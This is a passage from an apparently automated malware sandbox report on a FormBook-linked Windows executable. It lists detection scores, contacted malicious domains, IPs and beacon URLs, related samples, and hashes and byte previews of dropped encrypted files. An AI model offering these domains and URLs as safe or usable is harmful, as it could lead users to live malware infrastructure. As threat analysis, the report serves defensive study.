(BRITISH) 22->36 38 2 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            3T-ENQ-O-2024-10856.exe34%ReversingLabs
            3T-ENQ-O-2024-10856.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.chamadaslotgiris.net/gqyt/?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth-0%Avira URL Cloudsafe
            http://www.independent200.org/yl6y/?yXf=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+TDdCZJ74ZBA3ZkRiMUCXQcAhgpMcC+j5S2A=&ndk=ctppWTth-0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/0%Avira URL Cloudsafe
            http://www.tigre777gg.online0%Avira URL Cloudsafe
            http://www.independent200.org/yl6y/0%Avira URL Cloudsafe
            https://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqv0%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU=0%Avira URL Cloudsafe
            http://www.mediaplug.biz/osde/?yXf=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sZHqZF0jtyzh4SZws5yKjtHhCwOPV3WXnk7o=&ndk=ctppWTth-0%Avira URL Cloudsafe
            http://www.masteriocp.online/p5rq/0%Avira URL Cloudsafe
            http://www.tigre777gg.online/06rp/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.independent200.org
            		103.42.108.46
            		truetrue
              		unknown
              chamadaslotgiris.net
              		3.33.130.190
              		truetrue
                		unknown
                dns.ladipage.com
                		18.139.62.226
                		truetrue
                  		unknown
                  tigre777gg.online
                  		3.33.130.190
                  		truetrue
                    		unknown
                    www.mediaplug.biz
                    		66.81.203.10
                    		truetrue
                      		unknown
                      www.linkbasic.net
                      		unknown
                      		unknowntrue
                        		unknown
                        www.masteriocp.online
                        		unknown
                        		unknowntrue
                          		unknown
                          www.chamadaslotgiris.net
                          		unknown
                          		unknowntrue
                            		unknown
                            www.tigre777gg.online
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.masteriocp.online/p5rq/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.independent200.org/yl6y/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5XgIEfDpHSeJZt7k9yl5pOWpoKoGLmM15kwU=true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mediaplug.biz/osde/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.mediaplug.biz/osde/?yXf=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sZHqZF0jtyzh4SZws5yKjtHhCwOPV3WXnk7o=&ndk=ctppWTth-true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.chamadaslotgiris.net/gqyt/?yXf=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQyyR5H80Th6YuXnGllCxy50CTDtPW+4zyR3Ik=&ndk=ctppWTth-true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.independent200.org/yl6y/?yXf=QPKrZbNCTa4h9OiWdSr2LPtYKpnFP+xQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+TDdCZJ74ZBA3ZkRiMUCXQcAhgpMcC+j5S2A=&ndk=ctppWTth-true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tigre777gg.online/06rp/true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tigre777gg.onlineCgEnKbPFVbMNeA.exe, 00000008.00000002.2601820210.000000000546B000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.masteriocp.online/p5rq/?ndk=ctppWTth-&yXf=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvnetbtugc.exe, 00000005.00000002.2600631900.00000000045A8000.00000004.10000000.00040000.00000000.sdmp, CgEnKbPFVbMNeA.exe, 00000008.00000002.2600215728.00000000036B8000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.ecosia.org/newtab/netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000005.00000003.2055133201.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              18.139.62.226
                              		dns.ladipage.comUnited States
                              		16509AMAZON-02UStrue
                              66.81.203.10
                              		www.mediaplug.bizVirgin Islands (BRITISH)
                              		40034CONFLUENCE-NETWORK-INCVGtrue
                              103.42.108.46
                              		www.independent200.orgAustralia
                              		45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
                              3.33.130.190
                              		chamadaslotgiris.netUnited States
                              		8987AMAZONEXPANSIONGBtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1509340
                              Start date and time:2024-09-11 14:23:14 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 26s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:10
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:3T-ENQ-O-2024-10856.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/3@6/4
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
                              • Successful, ratio: 91%
                              • Number of executed functions: 53
                              • Number of non-executed functions: 292
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • VT rate limit hit for: 3T-ENQ-O-2024-10856.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:25:41API Interceptor928492x Sleep call for process: netbtugc.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              18.139.62.226Scan 00093847.exeGet hashmaliciousFormBookBrowse
                              • www.masteriocp.online/wg84/
                              DN.exeGet hashmaliciousFormBookBrowse
                              • www.masteriocp.online/p5rq/
                              DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                              • www.gaolibai.site/dk07/?hJ=D8pto4BPuzWD9&BZy=GDy9Ivf9UNaqrv9frjLto9uu2IkJerzBBeACnqJs3sHtDRLx3rmxpepnBsqEQrJHpKMtcSrveA==
                              Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                              • www.againbeautywhiteskin.asia/3h10/
                              SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.hisako.store/e368/
                              103.42.108.46New Purchase Order.exeGet hashmaliciousFormBookBrowse
                              • www.mbwd.store/pn1r/?lt=gKnM/UYa57ur7VVzNcvkzBuMpwTVzE14/GtRoFWV9RJaxqyHi91lxRYvKS9XNcGV9MGsPko/NpaB+uWz1UCX1wHhyYSOikvVIVM8anokYkTUErXORgkeTZM=&3ry=nj20Xr
                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                              • www.mbwd.store/pn1r/
                              LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                              • www.independent200.org/peuo/
                              rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                              • www.mbwd.store/bmmx/
                              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.mbwd.store/pn1r/
                              TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                              • www.mtmoriacolives.store/bkj6/
                              6ddrUd6iQo.exeGet hashmaliciousFormBookBrowse
                              • www.eastcoastev.site/51n1/
                              INV90097.exeGet hashmaliciousFormBookBrowse
                              • www.anzskincare.xyz/n1ua/
                              Electronic Order.exeGet hashmaliciousFormBookBrowse
                              • www.dtalusering.com/la5g/
                              Inquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                              • www.dtalengineering.com/la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJw
                              3.33.130.190DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                              • www.doggieradio.net/hzuv/
                              INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                              • www.digitalbloom.info/paa2/
                              8097600987765.exeGet hashmaliciousFormBookBrowse
                              • www.shapenbuy.com/3ddr/
                              PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                              • www.thewhitediamond.org/5hpf/
                              September Order.exeGet hashmaliciousFormBookBrowse
                              • www.sansensors.info/1hhl/
                              PO#86637.exeGet hashmaliciousFormBookBrowse
                              • www.autonashville.com/7d10/
                              Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                              • www.thewhitediamond.org/chud/
                              MV ALIADO-S-REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                              • www.airights.info/8udz/
                              PROFORMA INVOICE BKS-0121-24-25-JP240604.exeGet hashmaliciousFormBookBrowse
                              • www.omexai.info/45sz/
                              filz.exeGet hashmaliciousFormBookBrowse
                              • www.globyglen.info/f4jh/?CB=56D/2OMVxsGldoxXdt4/5+YT3Tg5DYLVkxlzWzxnZK3OfEKbb6scc6EswMBS+UFsc09ekpwS55TcFwn96K5YRHXyIA0rVsBfoSg00AWGtZraXHwG7iVCMNE=&nfXl=ylNP

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              dns.ladipage.comNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                              • 54.179.173.60
                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                              • 18.139.62.226
                              z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                              • 13.228.81.39
                              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 13.228.81.39
                              DN.exeGet hashmaliciousFormBookBrowse
                              • 18.139.62.226
                              https://www.newbalancestore.asia/nb530.nh?utm_source=saleGet hashmaliciousUnknownBrowse
                              • 13.228.81.39
                              DHL_497104778908.exeGet hashmaliciousFormBookBrowse
                              • 18.139.62.226
                              Shipping Documents 7896424100.exeGet hashmaliciousFormBookBrowse
                              • 13.228.81.39
                              INV90097.exeGet hashmaliciousFormBookBrowse
                              • 54.179.173.60
                              PRE-ALERT HTHC22031529.exeGet hashmaliciousFormBookBrowse
                              • 54.179.173.60
                              www.independent200.orgLKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                              • 103.42.108.46
                              www.mediaplug.bizJsn496Em5T.exeGet hashmaliciousFormBookBrowse
                              • 66.81.203.135
                              6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                              • 66.81.203.200
                              Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                              • 66.81.203.200
                              z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                              • 66.81.203.200
                              DN.exeGet hashmaliciousFormBookBrowse
                              • 66.81.203.135
                              Filename.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                              • 66.81.203.200

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                              • 103.42.108.46
                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                              • 103.42.108.46
                              firmware.sh4.elfGet hashmaliciousUnknownBrowse
                              • 103.27.32.30
                              LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                              • 103.42.108.46
                              http://www.greenprintlandscapes.com.auGet hashmaliciousUnknownBrowse
                              • 110.232.143.97
                              http://fslink.megnagroup.com.au/email/track/click?hash=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7Im11c3RoIjoiaHR0cHM6Ly9tZWduYWdyb3VwLmNvbS5hdS8iLCJsaW9uIjoiNzVkNGMiLCJnb3JpbGxhIjoiYmE1MDZjM2NlIiwidGlnZXIiOiJmc2xpbmsubWVnbmFncm91cC5jb20uYXUifSwiaWF0IjoxNzI0OTg3NTgyfQ.q2Cl712fuiOGcrrlV8jnMlRPUIhIoDJ0d2m4R_WTYLA~eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7ImhvcnNlIjoia2V2aW4uc21pdGhAc2FuaXRhcml1bS5jb20uYXUiLCJjYW1lbCI6ImJhNmM1MDlmZSJ9LCJpYXQiOjE3MjQ5ODc1ODJ9.KTlm-RKp1KYEIDipXUGHrWZz7AycFi0jesA9WqoLoigGet hashmaliciousUnknownBrowse
                              • 110.232.143.78
                              rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                              • 103.42.108.46
                              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 103.42.108.46
                              RFQ-HL51L05.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 110.232.143.114
                              TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                              • 103.42.108.46
                              AMAZON-02UShttps://www.izmailovo.ru/contacts/Get hashmaliciousHTMLPhisherBrowse
                              • 54.195.103.155
                              https://google.com.////amp/s/%E2%80%8Bc%C2%ADt%C2%ADh%E2%80%8B.%C2%ADv%C2%ADn/.dev/Yp0Hz21d/bGF1cmVuLmNvaGVuQGJvYXJzaGVhZC5jb20==$%E3%80%82?safe=activeGet hashmaliciousUnknownBrowse
                              • 35.156.118.53
                              http://email.friendbuy-mail.com/ls/click?upn=u001.8DvoQuH4u5PpaoiKqEq-2B9gjT1RnQAWIB6y8UcLzfbe53oufIOHmDfYdu6C6P6e3OEC2Aw0nU2F2H15JLKKYH0w-3D-3D4p02_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FDdnPYo6TRy4h3mM8HNTqUwSZO8hKXT-2FtDG93u3GX9X7qz54Yl0Q2XmTivXHYnoQBormkb-2FG3bQ-2FVuLKqMl82cXlNuvHa0jA7PJJXvRiIFqct1bOCE2NM4HG0BbvOTDGNTYI0FNj28b3h4C9dx6T3K7jMSTwy5OESQzYuaKBHUDqRRSZZ-2B3x2p8gJI9dqsfDOI-3DGet hashmaliciousHTMLPhisherBrowse
                              • 18.239.18.33
                              http://web-accessalerts.com.web-accessalerts.com/web-accessalerts.com/47bce5/3cfeedbc-cfaa-4637-abbf-8f7aa82f59beGet hashmaliciousUnknownBrowse
                              • 13.227.219.18
                              https://ad.doubleclick.net/ddm/clk/586708840;395014688;zGet hashmaliciousHTMLPhisherBrowse
                              • 54.213.108.146
                              https://arcg.is/1PqXT10Get hashmaliciousUnknownBrowse
                              • 52.222.214.69
                              E240902 R0 Specserve-Fabrication and Supply of Gi Ducts.pdfGet hashmaliciousUnknownBrowse
                              • 13.33.187.68
                              https://Np8W.pivorixal.su/zbs3/?qrc=qa-sqi@qvcjp.comGet hashmaliciousHTMLPhisherBrowse
                              • 34.251.82.109
                              https://www.google.com/url?q=//www.google.com.br/amp/s/iKL5afRe0S6hy3p0slRKsXiNT5VzWqeGhx.desarrollodigitales.com/xiwitytevd/sotutybgetd/qoguhtunh/I6Gu0C/cWEtc3FpQHF2Y2pwLmNvbQ==Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                              • 13.33.187.68
                              Wire-transaction073921.exeGet hashmaliciousSilverRatBrowse
                              • 13.35.58.118
                              AMAZONEXPANSIONGBDOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                              • 3.33.130.190
                              INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                              • 3.33.130.190
                              https://arcg.is/1PqXT10Get hashmaliciousUnknownBrowse
                              • 3.33.220.150
                              https://ledgerliveofficialsite.gitbook.io/Get hashmaliciousUnknownBrowse
                              • 52.223.40.198
                              8097600987765.exeGet hashmaliciousFormBookBrowse
                              • 3.33.130.190
                              PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                              • 3.33.130.190
                              September Order.exeGet hashmaliciousFormBookBrowse
                              • 3.33.130.190
                              https://www.tiktok.com/////link/v2?aid=1988&lang=enFSmPWg&scene=bio_url&target=google.com////amp/s/jbmagneticos.com.br/.dev/VGCU2YC1/c211bGxpbmdzQHRtaGNjLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                              • 3.33.220.150
                              http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                              • 52.223.40.198
                              PO#86637.exeGet hashmaliciousFormBookBrowse
                              • 3.33.130.190
                              CONFLUENCE-NETWORK-INCVGBCNFNjvJNq.exeGet hashmaliciousADWIND, Lokibot, Ramnit, SalityBrowse
                              • 204.11.56.48
                              Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                              • 66.81.203.135
                              EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                              • 208.91.197.27
                              OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                              • 199.191.50.83
                              5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                              • 199.191.50.83
                              uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                              • 199.191.50.83
                              M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                              • 208.91.196.145
                              6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                              • 66.81.203.200
                              firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                              • 204.11.56.48
                              firmware.i586.elfGet hashmaliciousUnknownBrowse
                              • 204.11.56.48

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\1m0Sa73J8

                              Download File
                              Process:C:\Windows\SysWOW64\netbtugc.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.1209935793793442
                              Encrypted:false
                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                              MD5:214CFA91B0A6939C4606C4F99C9183B3
                              SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                              SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                              SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\autEA31.tmp

                              Download File
                              Process:C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):287744
                              Entropy (8bit):7.993294359405002
                              Encrypted:true
                              SSDEEP:6144:EQsJoJg/J/1QaoCRzeFYu6ipL37jfnnbulNZ9mt6hF6d+xxIkx574U2eT:E9Js43vQnbulNPAK6d+vnxmUbT
                              MD5:8B92B295F99F1DEBF0C18AB4A336032E
                              SHA1:470FC9FE9205D17078390E7F4DE20F03BD1F1744
                              SHA-256:63B74B169D99018C2F6728B725DC29EA79BDAACC9FEA866593845FAF133C2EE4
                              SHA-512:AAF46146BF875D2FC3B5FADCEFBF490A95EA6C2FFD21E57629A21B1A3191E6305195CA6B58604CEF097B8027F09B8539DCD37343362FF8C70431B3951BACD894
                              Malicious:false
                              Reputation:low
                              Preview:.kq..PAU6..A...k.SW....SC...6XUUH34EOWXSTUE14PKPAU6XUUH34E.WXSZJ.?4.B.`.7..t.[]6o'*<3'$\.3*>/:Bx70hAA+o>6s....Y?/5oX;RqUH34EOW!R].xQS.v0&..82.R...u7?.N....0,.[.i5/.f,,?e33.E14PKPAUf.UU.25E....TUE14PKP.U4Y^TC34.KWXSTUE14P+DAU6HUUHC0EOW.STEE14RKPGU6XUUH32EOWXSTUEA0PKRAU6XUUJ3t.OWHSTEE14P[PAE6XUUH3$EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH3.1*/,STU.a0PK@AU6.QUH#4EOWXSTUE14PKPaU68UUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6X

                              C:\Users\user\AppData\Local\Temp\horrify

                              Download File
                              Process:C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):287744
                              Entropy (8bit):7.993294359405002
                              Encrypted:true
                              SSDEEP:6144:EQsJoJg/J/1QaoCRzeFYu6ipL37jfnnbulNZ9mt6hF6d+xxIkx574U2eT:E9Js43vQnbulNPAK6d+vnxmUbT
                              MD5:8B92B295F99F1DEBF0C18AB4A336032E
                              SHA1:470FC9FE9205D17078390E7F4DE20F03BD1F1744
                              SHA-256:63B74B169D99018C2F6728B725DC29EA79BDAACC9FEA866593845FAF133C2EE4
                              SHA-512:AAF46146BF875D2FC3B5FADCEFBF490A95EA6C2FFD21E57629A21B1A3191E6305195CA6B58604CEF097B8027F09B8539DCD37343362FF8C70431B3951BACD894
                              Malicious:false
                              Reputation:low
                              Preview:.kq..PAU6..A...k.SW....SC...6XUUH34EOWXSTUE14PKPAU6XUUH34E.WXSZJ.?4.B.`.7..t.[]6o'*<3'$\.3*>/:Bx70hAA+o>6s....Y?/5oX;RqUH34EOW!R].xQS.v0&..82.R...u7?.N....0,.[.i5/.f,,?e33.E14PKPAUf.UU.25E....TUE14PKP.U4Y^TC34.KWXSTUE14P+DAU6HUUHC0EOW.STEE14RKPGU6XUUH32EOWXSTUEA0PKRAU6XUUJ3t.OWHSTEE14P[PAE6XUUH3$EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH3.1*/,STU.a0PK@AU6.QUH#4EOWXSTUE14PKPaU68UUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6XUUH34EOWXSTUE14PKPAU6X

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.1446536703683385
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:3T-ENQ-O-2024-10856.exe
                              File size:1'209'344 bytes
